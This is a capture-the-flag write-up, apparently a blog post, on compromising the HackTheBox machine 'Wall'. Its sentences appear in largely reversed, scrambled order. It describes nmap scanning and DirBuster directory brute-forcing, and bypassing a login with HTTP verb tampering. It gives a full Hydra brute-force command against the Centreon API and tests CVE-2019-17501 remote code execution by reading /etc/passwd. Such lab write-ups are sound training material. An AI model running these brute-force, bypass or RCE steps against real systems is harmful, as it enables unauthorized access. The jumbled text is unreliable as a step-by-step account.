After entering the command we hit that Blue Play button (Highlighted in the Image). We entered “cat /etc/passwd” here to check if RCE is working. On a closer look, the PoC contained a path. There was a GitHub link mentioned in the description of this CVE. We did our research and found CVE-2019-17501. But being in the penetration testing business we are sure to check out the CVEs for any panel, software or CMS. Now, this panel which we got was not something that we are used to working every day. Followed by the URL and usernames and password parameters and the response text that could be used to differentiate the valid and invalid credentials. Then we provided the type of authentication panel, which is “http-post-form”. Then we provided the wordlist for bruteforce. We got this from the initial login panel. Here, we started by giving the username “admin”. hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.157 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad Credentials" -V We crafted this query to bruteforce with the Hydra Tool. So we gained enough information for crafting a bruteforce query. When we did so, we got the message “Bad Credentials”. We looked for the API documentation for Centreon () to find the query that can be brute-forced, In the API documentation, we are told to send a POST request to the API. So we decided to bruteforce the API for the credentials. Then we ran a directory bruteforce on this page. Then we took a closer look at the source code of the page and found a centreon token that was preventing us from brute-forcing. We tried to bruteforce it using Burpsuite but we were unsuccessful. How lucky! Now we need to bypass this as well. Verb Tampering worked and we were redirected to the /centreon/ page. After making this change, we forwarded the request to the server. We decided to tamper with it and we changed it to POST. So, we fired up our BurpSuite and captured the request of the /monitoring/ page.Īs we observed that there is a GET request being sent to the server. That’s when it hit us, we should try HTTP Verb Tampering. Now, all we got to do is get through this panel.Īfter trying a bunch of bruteforce techniques, we were not able to get through his login panel. It does say that “Protected area by the admin”. So, we entered the URL in the Browser and we have ourselves a Login Panel. After everything is set, just click Start and kickback.Īfter working for a while, it gave us one directory called monitoring, Felt to take a look at it. It can be found in Kali Linux by default. Here, in this case, we will be using the medium.txt. Enter the Target URL, locate the dictionary you want to use for the bruteforce. Generally, we use the dirb tool but let’s show some love to DirBuster sometimes as well. Its time to do some directory bruteforce on our target. It gave us a default Debian Apache is Working Page. We ran the browser and opened the IP Address of the Machine. It positively informed that the following ports and services are running 22 (SSH), 80(HTTP). The Nmap Aggressive scan quickly gave us some great information. To get the most information and fast, we ran the Aggressive Scan. For this, we will be running a nmap scan. Now that we have the IP Address, We need to enumerate open ports on the machine. Machines hosted on HackTheBox have a static IP Address. To Attack any machine, we need the IP Address. Bypass Authentication using Verb Tampering.Let’s get cracking!! Penetration Testing Methodology This is a Capture the Flag type of challenge. Today we are going to crack a machine called Wall.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |